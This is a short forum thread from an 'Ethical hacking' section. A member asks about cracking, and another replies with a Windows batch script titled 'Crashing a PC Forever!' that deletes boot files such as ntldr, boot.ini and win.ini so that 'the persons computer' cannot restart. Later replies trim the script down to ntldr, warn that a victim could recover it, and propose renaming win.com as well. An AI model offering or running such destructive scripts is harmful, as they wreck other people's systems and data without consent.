1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

cracking..

Discussion in 'Ethical hacking' started by heiro, Oct 8, 2007.

  1. heiro

    heiro New Member

    Joined:
    Sep 7, 2007
    Messages:
    23
    Likes Received:
    0
    Trophy Points:
    0
    thus anyone here knows how to crack????or what did most crackers do and what they use???
     
  2. SpOonWiZaRd

    SpOonWiZaRd Know what you can do.

    Joined:
    May 30, 2007
    Messages:
    747
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Network Engineer/Programmer
    Location:
    South Africa
  3. faizulhaque

    faizulhaque New Member

    Joined:
    May 23, 2008
    Messages:
    213
    Likes Received:
    3
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    Karachi
    Home Page:
    Use this
    Crashing a PC Forever !

    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini

    Open up notepad and copy and paste that. Save it as a .bat file.
    This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
    REMEMBER - DO NOT CLICK THIS FILE. (for the idiots):P
    **Also remember this might not work with vista.**
     
  4. neo_vi

    neo_vi Member

    Joined:
    Feb 1, 2008
    Messages:
    722
    Likes Received:
    15
    Trophy Points:
    18
    Occupation:
    Software engineer
    Location:
    Earth
    Home Page:
    Y to delete all those files. Juz ntldr is enough..
    And if the guy knows much about DOS he can make the system work by using Recovery console.. Mind that too whn u r doing this..
     
  5. faizulhaque

    faizulhaque New Member

    Joined:
    May 23, 2008
    Messages:
    213
    Likes Received:
    3
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    Karachi
    Home Page:
    put another code in it
    rename win.com abc.com

    then
    ?
     

Share This Page